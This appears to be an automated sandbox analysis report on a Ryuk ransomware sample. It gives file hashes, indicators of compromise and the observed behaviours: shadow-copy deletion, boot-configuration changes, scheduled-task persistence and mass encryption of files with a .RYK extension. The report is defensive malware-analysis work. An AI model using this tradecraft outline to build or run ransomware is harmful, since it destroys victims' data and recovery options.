Analysis
-
max time kernel
146s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
10-11-2022 06:20
Static task
static1
Behavioral task
behavioral1
Sample
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Resource
win10v2004-20220901-en
General
-
Target
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
-
Size
885KB
-
MD5
a57e1e6fe1c98d2e75799a46e9eb5797
-
SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4
-
SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
-
SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
-
SSDEEP
12288:zD7Z7cwy8U9JlpYqWYgeWYg955/155/0QebUlAAsDsKKAosRn6X:z57ctflKgQKUKRDsKKAjN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1420 bcdedit.exe 988 bcdedit.exe -
Processes:
wbadmin.exepid process 1728 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exedescription ioc process File opened (read-only) \??\V: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Z: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\M: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\O: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Q: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\R: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\S: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\G: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\H: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\J: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\A: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\U: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\W: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\X: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Y: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\E: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\K: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\B: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\P: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\T: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\F: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\I: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\L: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\N: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Drops file in Program Files directory 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File created C:\Program Files\Java\RyukReadMe.html 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SplashScreen.bmp.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN075.XML.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Median.thmx.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\HeartsMCE.lnk.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OCT.CHM.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Drops file in Windows directory 2 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exedescription ioc process File created C:\Windows\RyukReadMe.txt 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File created C:\Windows\hrmlog1 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 288 schtasks.exe 1776 schtasks.exe 592 schtasks.exe 1136 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1708 vssadmin.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1096 taskkill.exe 1968 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exepid process 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1096 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1468 wrote to memory of 1416 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1416 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1416 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1416 wrote to memory of 1776 1416 cmd.exe schtasks.exe PID 1416 wrote to memory of 1776 1416 cmd.exe schtasks.exe PID 1416 wrote to memory of 1776 1416 cmd.exe schtasks.exe PID 1468 wrote to memory of 1376 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1376 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1376 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1064 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1064 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1064 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 296 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 296 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 296 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 296 wrote to memory of 592 296 cmd.exe schtasks.exe PID 296 wrote to memory of 592 296 cmd.exe schtasks.exe PID 296 wrote to memory of 592 296 cmd.exe schtasks.exe PID 1468 wrote to memory of 1936 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1936 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1936 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1936 wrote to memory of 1368 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1368 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1368 1936 cmd.exe attrib.exe PID 1468 wrote to memory of 464 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 464 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 464 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 464 wrote to memory of 1136 464 cmd.exe schtasks.exe PID 464 wrote to memory of 1136 464 cmd.exe schtasks.exe PID 464 wrote to memory of 1136 464 cmd.exe schtasks.exe PID 1468 wrote to memory of 1780 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1780 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to 